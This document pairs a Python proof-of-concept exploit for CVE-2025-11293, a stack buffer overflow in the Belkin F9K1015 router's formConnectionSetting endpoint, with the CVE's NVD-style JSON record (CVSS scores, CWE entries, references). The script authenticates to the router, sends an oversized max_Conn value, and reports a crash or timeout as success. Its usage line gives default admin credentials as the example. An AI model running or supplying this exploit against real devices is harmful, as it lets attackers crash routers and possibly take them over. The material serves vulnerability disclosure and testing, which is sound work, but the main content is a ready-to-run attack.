CVE-2025-11293

#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ CVE-2025-11293 - Belkin F9K1015 formConnectionSetting Buffer Overflow PoC Vulnerability: Stack-based buffer overflow via max_Conn parameter Target: Belkin F9K1015 v1.00.10 Endpoint: /goform/formConnectionSetting """ import requests import sys from urllib3.exceptions import InsecureRequestWarning # Disable SSL warnings requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) def exploit(target_url, username, password): """ Exploit the buffer overflow vulnerability in formConnectionSetting. The max_Conn parameter is not properly validated, leading to buffer overflow. """ session = requests.Session() # Step 1: Authenticate to the router web interface login_url = f"{target_url}/login.cgi" login_data = { "username": username, "password": password, "submit": "Login" } try: resp = session.post(login_url, data=login_data, verify=False, timeout=10) print(f"[*] Login attempt status: {resp.status_code}") except Exception as e: print(f"[-] Login failed: {e}") return False # Step 2: Craft the malicious payload for max_Conn parameter # The buffer overflow is triggered by an oversized max_Conn value # Adjust the payload size based on the target buffer size overflow_payload = "A" * 4096 # Overflow the stack buffer # Step 3: Send the exploit request to formConnectionSetting endpoint exploit_url = f"{target_url}/goform/formConnectionSetting" exploit_data = { "max_Conn": overflow_payload, # Additional parameters that may be required by the form "connMode": "0", "submit": "Apply" } headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-11293)" } try: print(f"[*] Sending exploit payload to {exploit_url}") resp = session.post(exploit_url, data=exploit_data, headers=headers, verify=False, timeout=10) print(f"[*] Response status: {resp.status_code}") print(f"[*] Response length: {len(resp.text)}") # Check if the device crashed or returned unexpected response if resp.status_code == 500 or "error" in resp.text.lower(): print("[+] Target may be vulnerable - abnormal response detected") return True else: print("[*] Request completed") return True except requests.exceptions.Timeout: print("[+] Target may have crashed - timeout detected (possible overflow success)") return True except requests.exceptions.ConnectionError: print("[+] Connection refused - target may have crashed due to overflow") return True except Exception as e: print(f"[-] Exploit error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: {sys.argv[0]} <target_url> <username> <password>") print(f"Example: {sys.argv[0]} http://192.168.2.1 admin admin") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] print("=" * 60) print("CVE-2025-11293 - Belkin F9K1015 Buffer Overflow PoC") print("=" * 60) exploit(target, user, pwd)

{"cve": {"id": "CVE-2025-11293", "sourceIdentifier": "[email protected]", "published": "2025-10-05T16:15:45.920", "lastModified": "2025-10-07T17:27:49.340", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Belkin F9K1015 1.00.10. Affected by this vulnerability is an unknown functionality of the file /goform/formConnectionSetting. The manipulation of the argument max_Conn leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:belkin:f9k1015_firmware:1.00.10:*:*:*:*:*:*:*", "matchCriteriaId": "3DEB0AFD-4E01-4FD5-8A41-6BD0E2D4DF0B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:belkin:f9k1015:-:*:*:*:*:*:*:*", "matchCriteriaId": "0D273CA6-07A9-43B2-87B3-D0DE1A5B89FA"}]}]}], "references": [{"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formConnectionSetting.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formConnectionSetting.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327174", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327174", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.661296", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formConnectionSetting.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formConnectionSetting.md#poc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}